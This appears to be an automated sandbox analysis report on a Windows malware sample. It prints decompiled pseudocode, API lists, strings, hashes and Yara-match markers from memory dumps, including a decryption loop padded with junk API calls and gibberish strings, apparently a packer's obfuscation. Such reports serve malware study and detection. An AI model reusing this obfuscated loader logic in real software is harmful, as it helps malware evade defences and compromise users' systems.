								_t318 = ( *(_t177 - 0x12) & 0x000000ff) - ( *(_t181 - 0x12) & 0x000000ff);
								if(_t318 == 0) {
									L30:
									_t284 = ( *(_t177 - 0x11) & 0x000000ff) - ( *(_t181 - 0x11) & 0x000000ff);
									if(_t284 != 0) {
										_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
									}
									goto L33;
								}
								_t284 = (0 | _t318 > 0x00000000) + (0 | _t318 > 0x00000000) - 1;
								if(_t284 != 0) {
									goto L1;
								}
								goto L30;
							}
							_t284 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
							if(_t284 != 0) {
								goto L1;
							}
							goto L28;
						}
						_t284 = (0 | _t314 > 0x00000000) + (0 | _t314 > 0x00000000) - 1;
						if(_t284 != 0) {
							goto L1;
						}
						goto L26;
					}
					_t321 = (_t187 & 0x000000ff) - ( *(_t181 - 0x18) & 0x000000ff);
					if(_t321 == 0) {
						L15:
						_t323 = ( *(_t177 - 0x17) & 0x000000ff) - ( *(_t181 - 0x17) & 0x000000ff);
						if(_t323 == 0) {
							L17:
							_t325 = ( *(_t177 - 0x16) & 0x000000ff) - ( *(_t181 - 0x16) & 0x000000ff);
							if(_t325 == 0) {
								L19:
								_t284 = ( *(_t177 - 0x15) & 0x000000ff) - ( *(_t181 - 0x15) & 0x000000ff);
								if(_t284 != 0) {
									_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
								}
								goto L22;
							}
							_t284 = (0 | _t325 > 0x00000000) + (0 | _t325 > 0x00000000) - 1;
							if(_t284 != 0) {
								goto L1;
							}
							goto L19;
						}
						_t284 = (0 | _t323 > 0x00000000) + (0 | _t323 > 0x00000000) - 1;
						if(_t284 != 0) {
							goto L1;
						}
						goto L17;
					}
					_t284 = (0 | _t321 > 0x00000000) + (0 | _t321 > 0x00000000) - 1;
					if(_t284 != 0) {
						goto L1;
					}
					goto L15;
				} else {
					__esi = __dl & 0x000000ff;
					__edx =  *(__ecx - 0x1c) & 0x000000ff;
					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
					if(__esi == 0) {
						L4:
						__esi =  *(__eax - 0x1b) & 0x000000ff;
						__edx =  *(__ecx - 0x1b) & 0x000000ff;
						__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
						if(__esi == 0) {
							L6:
							__esi =  *(__eax - 0x1a) & 0x000000ff;
							__edx =  *(__ecx - 0x1a) & 0x000000ff;
							__esi = ( *(__eax - 0x1a) & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
							if(__esi == 0) {
								L8:
								__esi =  *(__eax - 0x19) & 0x000000ff;
								__edx =  *(__ecx - 0x19) & 0x000000ff;
								__esi = ( *(__eax - 0x19) & 0x000000ff) - ( *(__ecx - 0x19) & 0x000000ff);
								if(__esi != 0) {
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = (__esi > 0) + (__esi > 0) - 1;
								}
								goto L11;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L1;
							}
							goto L8;
						}
						0 = 0 | __esi > 0x00000000;
						__edx = (__esi > 0) + (__esi > 0) - 1;
						__esi = __edx;
						if(__edx != 0) {
							goto L1;
						}
						goto L6;
					}
					0 = 0 | __esi > 0x00000000;
					__edx = (__esi > 0) + (__esi > 0) - 1;
					__esi = __edx;
					if(__edx != 0) {
						goto L1;
					}
					goto L4;
				}
				L1:
				_t178 = _t284;
				goto L80;
			}































                                                                                      0x0040e0ec
                                                                                      0x0040e0ec
                                                                                      0x0040e0f2
                                                                                      0x0040e165
                                                                                      0x0040e167
                                                                                      0x0040e169
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e16f
                                                                                      0x0040e175
                                                                                      0x0040e1f4
                                                                                      0x0040e1f6
                                                                                      0x0040e1f8
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e1fe
                                                                                      0x0040e204
                                                                                      0x0040e283
                                                                                      0x0040e285
                                                                                      0x0040e287
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e28d
                                                                                      0x0040e293
                                                                                      0x0040e312
                                                                                      0x0040e314
                                                                                      0x0040e316
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e322
                                                                                      0x0040e3a2
                                                                                      0x0040e3a4
                                                                                      0x0040e3a6
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e3ac
                                                                                      0x0040e3b2
                                                                                      0x0040e431
                                                                                      0x0040e433
                                                                                      0x0040e435
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e43b
                                                                                      0x0040e441
                                                                                      0x0040e4b2
                                                                                      0x0040e4b4
                                                                                      0x0040e4b6
                                                                                      0x0040e4b8
                                                                                      0x0040e4b8
                                                                                      0x0040e4ba
                                                                                      0x0040f216
                                                                                      0x0040f216
                                                                                      0x0040e44a
                                                                                      0x0040e44c
                                                                                      0x0040e45d
                                                                                      0x0040e465
                                                                                      0x0040e467
                                                                                      0x0040e478
                                                                                      0x0040e480
                                                                                      0x0040e482
                                                                                      0x0040e497
                                                                                      0x0040e49f
                                                                                      0x0040e4a1
                                                                                      0x0040e4ae
                                                                                      0x0040e4ae
                                                                                      0x00000000
                                                                                      0x0040e4a1
                                                                                      0x0040e48b
                                                                                      0x0040e491
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e493
                                                                                      0x0040e493
                                                                                      0x00000000
                                                                                      0x0040e493
                                                                                      0x0040e470
                                                                                      0x0040e476
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e476
                                                                                      0x0040e455
                                                                                      0x0040e45b
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e45b
                                                                                      0x0040e3bb
                                                                                      0x0040e3bd
                                                                                      0x0040e3d4
                                                                                      0x0040e3dc
                                                                                      0x0040e3de
                                                                                      0x0040e3f5
                                                                                      0x0040e3fd
                                                                                      0x0040e3ff
                                                                                      0x0040e416
                                                                                      0x0040e41e
                                                                                      0x0040e420
                                                                                      0x0040e42d
                                                                                      0x0040e42d
                                                                                      0x00000000
                                                                                      0x0040e420
                                                                                      0x0040e40c
                                                                                      0x0040e410
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e410
                                                                                      0x0040e3eb
                                                                                      0x0040e3ef
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e3ef
                                                                                      0x0040e3ca
                                                                                      0x0040e3ce
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e3ce
                                                                                      0x0040e32c
                                                                                      0x0040e32e
                                                                                      0x0040e345
                                                                                      0x0040e34d
                                                                                      0x0040e34f
                                                                                      0x0040e366
                                                                                      0x0040e36e
                                                                                      0x0040e370
                                                                                      0x0040e387
                                                                                      0x0040e38f
                                                                                      0x0040e391
                                                                                      0x0040e39e
                                                                                      0x0040e39e
                                                                                      0x00000000
                                                                                      0x0040e391
                                                                                      0x0040e37d
                                                                                      0x0040e381
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e381
                                                                                      0x0040e35c
                                                                                      0x0040e360
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e360
                                                                                      0x0040e33b
                                                                                      0x0040e33f
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e33f
                                                                                      0x0040e29c
                                                                                      0x0040e29e
                                                                                      0x0040e2b5
                                                                                      0x0040e2bd
                                                                                      0x0040e2bf
                                                                                      0x0040e2d6
                                                                                      0x0040e2de
                                                                                      0x0040e2e0
                                                                                      0x0040e2f7
                                                                                      0x0040e2ff
                                                                                      0x0040e301
                                                                                      0x0040e30e
                                                                                      0x0040e30e
                                                                                      0x00000000
                                                                                      0x0040e301
                                                                                      0x0040e2ed
                                                                                      0x0040e2f1
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e2f1
                                                                                      0x0040e2cc
                                                                                      0x0040e2d0
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e2d0
                                                                                      0x0040e2ab
                                                                                      0x0040e2af
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e2af
                                                                                      0x0040e20d
                                                                                      0x0040e20f
                                                                                      0x0040e226
                                                                                      0x0040e22e
                                                                                      0x0040e230
                                                                                      0x0040e247
                                                                                      0x0040e24f
                                                                                      0x0040e251
                                                                                      0x0040e268
                                                                                      0x0040e270
                                                                                      0x0040e272
                                                                                      0x0040e27f
                                                                                      0x0040e27f
                                                                                      0x00000000
                                                                                      0x0040e272
                                                                                      0x0040e25e
                                                                                      0x0040e262
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e262
                                                                                      0x0040e23d
                                                                                      0x0040e241
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e241
                                                                                      0x0040e21c
                                                                                      0x0040e220
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e220
                                                                                      0x0040e17e
                                                                                      0x0040e180
                                                                                      0x0040e197
                                                                                      0x0040e19f
                                                                                      0x0040e1a1
                                                                                      0x0040e1b8
                                                                                      0x0040e1c0
                                                                                      0x0040e1c2
                                                                                      0x0040e1d9
                                                                                      0x0040e1e1
                                                                                      0x0040e1e3
                                                                                      0x0040e1f0
                                                                                      0x0040e1f0
                                                                                      0x00000000
                                                                                      0x0040e1e3
                                                                                      0x0040e1cf
                                                                                      0x0040e1d3
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e1d3
                                                                                      0x0040e1ae
                                                                                      0x0040e1b2
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e1b2
                                                                                      0x0040e18d
                                                                                      0x0040e191
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e0f4
                                                                                      0x0040e0f4
                                                                                      0x0040e0f7
                                                                                      0x0040e0fb
                                                                                      0x0040e0fd
                                                                                      0x0040e110
                                                                                      0x0040e110
                                                                                      0x0040e114
                                                                                      0x0040e118
                                                                                      0x0040e11a
                                                                                      0x0040e12d
                                                                                      0x0040e12d
                                                                                      0x0040e131
                                                                                      0x0040e135
                                                                                      0x0040e137
                                                                                      0x0040e14a
                                                                                      0x0040e14a
                                                                                      0x0040e14e
                                                                                      0x0040e152
                                                                                      0x0040e154
                                                                                      0x0040e15a
                                                                                      0x0040e15d
                                                                                      0x0040e161
                                                                                      0x0040e161
                                                                                      0x00000000
                                                                                      0x0040e154
                                                                                      0x0040e13d
                                                                                      0x0040e140
                                                                                      0x0040e144
                                                                                      0x0040e148
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e148
                                                                                      0x0040e120
                                                                                      0x0040e123
                                                                                      0x0040e127
                                                                                      0x0040e12b
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e12b
                                                                                      0x0040e103
                                                                                      0x0040e106
                                                                                      0x0040e10a
                                                                                      0x0040e10e
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040e10e
                                                                                      0x0040e0e5
                                                                                      0x0040e0e5
                                                                                      0x00000000

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.302252171.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.302207503.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302729484.00000000004A7000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302737176.00000000004AD000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302741741.00000000004AE000.00000008.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302746457.00000000004AF000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302751068.00000000004BA000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                      • Instruction ID: 2c6faf662a173ce616d315292e1f84a282265d3ba05147685b3f7be9287a1502
                                                                                      • Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                      • Instruction Fuzzy Hash: 62C14873C0A9B30AC735852E445822BEE626FD174431ECBF29CA03F3C9967B9D2195D4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0084B0B0, Relevance: .3, Instructions: 345COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.303261681.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 260573a8829919281ce9b140437ef2de714630fc7763413699c1452f37438119
                                                                                      • Instruction ID: 82d8cf0c4e26d031a3515707ac1bd8369c290c0fcb14aa358241c68696ccf550
                                                                                      • Opcode Fuzzy Hash: 260573a8829919281ce9b140437ef2de714630fc7763413699c1452f37438119
                                                                                      • Instruction Fuzzy Hash: 19A1EA0A8090E4ABEF455A7E90B63FBAFE9CB27354E76719284D85B793C019120FDF50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 008430EE, Relevance: .3, Instructions: 337COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.303261681.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 86f4a122e0d78ebb15d6c80d3f8db1e35e712697e4858056224195d97d86bbbc
                                                                                      • Instruction ID: 01031f9733060372e49dc4c64eab98cf4f28593c37dfea0a5cce7aec6775dd8e
                                                                                      • Opcode Fuzzy Hash: 86f4a122e0d78ebb15d6c80d3f8db1e35e712697e4858056224195d97d86bbbc
                                                                                      • Instruction Fuzzy Hash: 8CB14D72700B164BD728EEA9DC91796B3E3AB84326F8EC73C9046C6F55F2BCA4454680
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0084CA10, Relevance: .3, Instructions: 280COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.303261681.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
                                                                                      • Instruction ID: 1a3b0efa1f04712b53ba36bf8709049e69276b1a282cef974ef2cd3997d45686
                                                                                      • Opcode Fuzzy Hash: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
                                                                                      • Instruction Fuzzy Hash: 1BC18CB5E002599FCB54CFA9C885ADEFBF1FF48300F24856AE919E7201E334AA558B54
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0084C760, Relevance: .2, Instructions: 239COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.303261681.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 61293238dc523bda29a07f89e573218fa02bdd4a3ea5a0101b4e634da50cabe3
                                                                                      • Instruction ID: f675d8c19ac0dab28620b3c6be011878332fb81c1eada811f5bc527cf674a699
                                                                                      • Opcode Fuzzy Hash: 61293238dc523bda29a07f89e573218fa02bdd4a3ea5a0101b4e634da50cabe3
                                                                                      • Instruction Fuzzy Hash: DAB16AB5E012599FCB84CFE9C885ADEFBF0FF48210F64816AD919E7301E334AA558B54
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 008618D0, Relevance: .1, Instructions: 76COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.303261681.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                      • Instruction ID: 3290a866668425eeec5a5df5501dd004489b7e3111da57d806264a214400602a
                                                                                      • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                      • Instruction Fuzzy Hash: 97113B7720008243EE44863DD4BC5B6DFA5FBC6321BAF427AD142CB75AD122D9419500
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0084B000, Relevance: .1, Instructions: 71COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.303261681.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d5d2e5b651617a4f85808dc17347bd2f4f1c2507898c94840b2185a5104128c2
                                                                                      • Instruction ID: bc18f0d63af314d3671e4580d57020916f12c29c48e9b935310c056f44c5da8b
                                                                                      • Opcode Fuzzy Hash: d5d2e5b651617a4f85808dc17347bd2f4f1c2507898c94840b2185a5104128c2
                                                                                      • Instruction Fuzzy Hash: 9A113D0A8492C4BDCF424A7840E56EBEFA58E3B218F4A71DA88C44B743D01B150FE7A1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00840042, Relevance: .1, Instructions: 61COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.303261681.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                      • Instruction ID: 795f648b5d90a5ec5479ba0ebaca9247a21416f8b5c153013536f91dae05d547
                                                                                      • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                      • Instruction Fuzzy Hash: DA1170723405049FD754DE65DC91FA773EAFB88320B298155EA08CB312D675EC01CB60
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004017B1, Relevance: 31.6, APIs: 13, Strings: 5, Instructions: 142memorystringCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 78%
                                                                                      			E004017B1(unsigned int* _a4) {
				signed int _v8;
				signed int _v12;
				char _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				long _v44;
				short _v2092;
				char _v3116;
				short _v4140;
				short _v6188;
				unsigned int* _t51;
				intOrPtr _t52;
				intOrPtr _t53;
				intOrPtr _t56;
				intOrPtr _t57;
				intOrPtr _t61;
				signed int _t68;
				unsigned int* _t83;
				unsigned int _t111;
				unsigned int _t112;

				E004136E0(0x1828);
				_t51 = _a4;
				_t112 =  *_t51;
				_t111 = _t51[1];
				if( *0x4b8384 == 0x904) {
					GetCommandLineA();
					SetEvent(0);
					HeapCreate(0, 0, 0);
				}
				_v16 = 0;
				if( *0x4b8384 == 0x114e) {
					VerLanguageNameW(0,  &_v4140, 0);
				}
				_t52 =  *0x4ae6e8; // 0xca91bdea
				_v40 = _t52;
				_t53 =  *0x4ae6ec; // 0xd9b1e084
				_v32 = _t53;
				E004017A7( &_v16);
				_v16 = _v16 + 0x22;
				if( *0x4b8384 == 0xb54) {
					__imp__CreateActCtxW(0);
					lstrcpyW( &_v2092, L"boxodexov rujavivokubecedubew lanokopipematonadofus pitoxabehobowerokinohogaxituk");
					EraseTape(0, 0, 0);
					__imp__FindNextVolumeA(0,  &_v3116, 0);
					__imp__FindFirstVolumeW( &_v6188, 0);
					__imp__FindNextVolumeA(0, 0, 0);
					LocalAlloc(0, 0);
				}
				_t56 =  *0x4ae6f0; // 0x6f476b76
				_v36 = _t56;
				_t57 =  *0x4ae6f4; // 0xd993b1c2
				_v28 = _t57;
				_v24 = 0x20;
				do {
					_v20 = 2;
					_v20 = _v20 + 3;
					E00401797(_t112,  &_v8);
					_v8 = _v8 + _v36;
					_t61 =  *0x4b8384;
					if(_t61 == 0xfa9) {
						 *0x4b6f94 = 0xedeb2e40;
					}
					if(_t61 == 0x3eb) {
						GetPrivateProfileSectionW(L"ruvalobibukuzefukeku",  &_v6188, 0, L"gewudubudihewujawejurorivujetit");
						InterlockedIncrement( &_v44);
						 *0x4b2f74 = 0;
					}
					 *0x4b6f90 = 0x9150ce2e;
					_v12 = _t112 >> _v20;
					E004017AE( &_v12, _v28);
					_t109 = _v16;
					_t68 = E004017A0(_v8, _v16 + _t112);
					_v8 = _t68;
					_t111 = _t111 - (_v12 ^ _t68);
					E00401797(_t111,  &_v8);
					_v12 = _t111 >> 5;
					E004017AE( &_v12, _v32);
					_v8 = E004017A0(_v8 + _v40, _t109 + _t111);
					E0040179D( &_v8, _v12);
					_t112 = _t112 - _v8;
					 *0x4b2f70 = 0;
					E00401790( &_v16);
					_t45 =  &_v24;
					 *_t45 = _v24 - 1;
				} while ( *_t45 != 0);
				_t83 = _a4;
				_t83[1] = _t111;
				 *_t83 = _t112;
				return _t83;
			}



























                                                                                      0x004017b9
                                                                                      0x004017be
                                                                                      0x004017c3
                                                                                      0x004017d2
                                                                                      0x004017d5
                                                                                      0x004017d7
                                                                                      0x004017de
                                                                                      0x004017e7
                                                                                      0x004017e7
                                                                                      0x004017f7
                                                                                      0x004017fa
                                                                                      0x00401805
                                                                                      0x00401805
                                                                                      0x0040180a
                                                                                      0x0040180f
                                                                                      0x00401812
                                                                                      0x00401817
                                                                                      0x0040181d
                                                                                      0x00401822
                                                                                      0x00401830
                                                                                      0x00401833
                                                                                      0x00401845
                                                                                      0x0040184e
                                                                                      0x0040185d
                                                                                      0x0040186b
                                                                                      0x00401874
                                                                                      0x0040187c
                                                                                      0x0040187c
                                                                                      0x00401882
                                                                                      0x00401887
                                                                                      0x0040188a
                                                                                      0x0040188f
                                                                                      0x00401892
                                                                                      0x00401899
                                                                                      0x00401899
                                                                                      0x004018a0
                                                                                      0x004018a9
                                                                                      0x004018b1
                                                                                      0x004018b4
                                                                                      0x004018be
                                                                                      0x004018c0
                                                                                      0x004018c0
                                                                                      0x004018cf
                                                                                      0x004018e3
                                                                                      0x004018ed
                                                                                      0x004018f3
                                                                                      0x004018f3
                                                                                      0x00401903
                                                                                      0x0040190d
                                                                                      0x00401913
                                                                                      0x00401918
                                                                                      0x00401922
                                                                                      0x0040192c
                                                                                      0x0040192f
                                                                                      0x0040193b
                                                                                      0x00401948
                                                                                      0x0040194e
                                                                                      0x00401966
                                                                                      0x0040196c
                                                                                      0x00401971
                                                                                      0x00401977
                                                                                      0x0040197d
                                                                                      0x00401982
                                                                                      0x00401982
                                                                                      0x00401982
                                                                                      0x0040198b
                                                                                      0x0040198e
                                                                                      0x00401992
                                                                                      0x00401997

                                                                                      APIs
                                                                                      • GetCommandLineA.KERNEL32 ref: 004017D7
                                                                                      • SetEvent.KERNEL32(00000000), ref: 004017DE
                                                                                      • HeapCreate.KERNEL32(00000000,00000000,00000000), ref: 004017E7
                                                                                      • VerLanguageNameW.KERNEL32(00000000,?,00000000), ref: 00401805
                                                                                      • CreateActCtxW.KERNEL32(00000000), ref: 00401833
                                                                                      • lstrcpyW.KERNEL32 ref: 00401845
                                                                                      • EraseTape.KERNEL32(00000000,00000000,00000000), ref: 0040184E
                                                                                      • FindNextVolumeA.KERNEL32(00000000,?,00000000), ref: 0040185D
                                                                                      • FindFirstVolumeW.KERNEL32(?,00000000), ref: 0040186B
                                                                                      • FindNextVolumeA.KERNEL32(00000000,00000000,00000000), ref: 00401874
                                                                                      • LocalAlloc.KERNEL32(00000000,00000000), ref: 0040187C
                                                                                      • GetPrivateProfileSectionW.KERNEL32 ref: 004018E3
                                                                                      • InterlockedIncrement.KERNEL32(?), ref: 004018ED
                                                                                      Strings
                                                                                      • gewudubudihewujawejurorivujetit, xrefs: 004018D1
                                                                                      • ", xrefs: 00401822
                                                                                      • boxodexov rujavivokubecedubew lanokopipematonadofus pitoxabehobowerokinohogaxituk, xrefs: 00401839
                                                                                      • ruvalobibukuzefukeku, xrefs: 004018DE
                                                                                      • , xrefs: 00401892
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.302252171.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.302207503.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302729484.00000000004A7000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302737176.00000000004AD000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302741741.00000000004AE000.00000008.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302746457.00000000004AF000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302751068.00000000004BA000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: FindVolume$CreateNext$AllocCommandEraseEventFirstHeapIncrementInterlockedLanguageLineLocalNamePrivateProfileSectionTapelstrcpy
                                                                                      • String ID: $"$boxodexov rujavivokubecedubew lanokopipematonadofus pitoxabehobowerokinohogaxituk$gewudubudihewujawejurorivujetit$ruvalobibukuzefukeku
                                                                                      • API String ID: 4220119196-1944441969
                                                                                      • Opcode ID: 2ee2a7eaa7ed71b9ee872e90a163dfbac12efe98467f88edce65ac7bdceb001b
                                                                                      • Instruction ID: df437bd4569fe57d5c07b3d64d3ad08a874dc7d940bc96f0e8ec0adffaf6704a
                                                                                      • Opcode Fuzzy Hash: 2ee2a7eaa7ed71b9ee872e90a163dfbac12efe98467f88edce65ac7bdceb001b
                                                                                      • Instruction Fuzzy Hash: E2510BB6D04208EFDB10DFA5DD859EEBBB8FB59314F00457AE501A3261DB389E44CB68
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040199A, Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 65fileCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 90%
                                                                                      			E0040199A() {
				long _v8;
				void _v1032;
				short _v3080;
				unsigned int _t5;
				unsigned int _t21;
				unsigned int* _t23;
				unsigned int* _t25;

				_t23 =  *0x4b3d8c;
				_t5 =  *0x4b8384 >> 3;
				if(_t5 > 0) {
					_t25 = _t23;
					_t21 = _t5;
					do {
						if( *0x4b8384 == 0xae9) {
							GetEnvironmentStringsW();
							__imp__DeactivateActCtx(0, 0);
							ReadConsoleW(0,  &_v1032, 0,  &_v8, 0);
							SetConsoleTitleW(L"mumefere pavegurovi");
							CopyFileW(L"yojepajumoninoxugevotecokuyabapesuwayidamewakejivumatuturoguxowofukojurirotuyumiwim", L"miwipufurudugiciyumenuzujifuhuvutedizocuditejeyimitip", 0);
							GetModuleFileNameW(0,  &_v3080, 0);
							SetConsoleTitleA("kuhidukefub wijobijawimusago zalewijofuhuxukuyepanujonus gohabiraposekenapogakafete calaluneyukuwaxetoyumafotamobi");
							BeginUpdateResourceW(0, 0);
							FreeConsole();
							SetEnvironmentVariableA("darujuwihunuyun zabebedidez zizofokajitaxipogejipubowexo gifitutatopumiduc deguvofagebifut", "cehiwah manamuxezexemuwetesaxuzaduzawor");
							SetConsoleWindowInfo(0, 0, 0);
							EndUpdateResourceA(0, 0);
						}
						_t5 = E004017B1(_t25);
						_t25 = _t25 + 8;
						_t21 = _t21 - 1;
					} while (_t21 != 0);
				}
				return _t5;
			}










                                                                                      0x004019a2
                                                                                      0x004019af
                                                                                      0x004019b6
                                                                                      0x004019be
                                                                                      0x004019c0
                                                                                      0x004019c2
                                                                                      0x004019cc
                                                                                      0x004019d2
                                                                                      0x004019da
                                                                                      0x004019ee
                                                                                      0x004019f9
                                                                                      0x00401a0a
                                                                                      0x00401a19
                                                                                      0x00401a24
                                                                                      0x00401a2c
                                                                                      0x00401a32
                                                                                      0x00401a42
                                                                                      0x00401a4b
                                                                                      0x00401a53
                                                                                      0x00401a53
                                                                                      0x00401a5a
                                                                                      0x00401a5f
                                                                                      0x00401a62
                                                                                      0x00401a62
                                                                                      0x00401a6a
                                                                                      0x00401a6d

                                                                                      APIs
                                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 004019D2
